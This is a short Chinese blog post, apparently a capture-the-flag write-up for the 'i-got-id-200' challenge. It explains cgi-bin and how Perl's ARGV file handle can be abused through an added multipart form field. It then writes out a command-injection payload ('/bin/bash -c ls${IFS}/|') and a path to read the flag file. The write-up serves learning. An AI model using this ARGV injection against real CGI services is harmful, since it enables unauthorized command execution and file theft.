i-got-id-200所得

i-got-id-200

writeup

https://blog.csdn.net/mochu7777777/article/details/104840872

问题

cgi-bin是什么？

cgi-bin是为了与主机的程序进行交互的目录，主机在cgi目录先对应着相关的程序，接受从cgi-bin目录网页下传递的值，进行处理。

# apache 
/usr/local/apache/cgi

https://blog.csdn.net/weixin_39609623/article/details/86312439

ARGV

-----------------------------1248478904583 #这一串是边界限定boundary根据自己流量包进行修改
Content-Disposition: form-data; name="file";
Content-Type: application/octet-stream

ARGV

ARGV有何作用
https://www.cnblogs.com/f-ck-need-u/p/9557041.html
ARGV是当前正在处理的文件句柄，传递给param()后，从网页中输入参数，函数进行处理，参数可控。根据cgi-bin的机制，可以运行系统env命令所以

传入payload:?/bin/bash%20-c%20ls${IFS}/|
# ${IFS} shell中的分割符，即空白
# / 转义连接符，将后序的管道符|连接
# | 将前一句的结果作为参数传入

?/flag
/代表目录路径，即根目录下的flag

posted @ 2022-03-13 20:01 sovo 阅读(60) 评论(0) 收藏举报

刷新页面返回顶部

Loading

sovo

i-got-id-200所得

i-got-id-200

writeup

问题

cgi-bin是什么？

ARGV

公告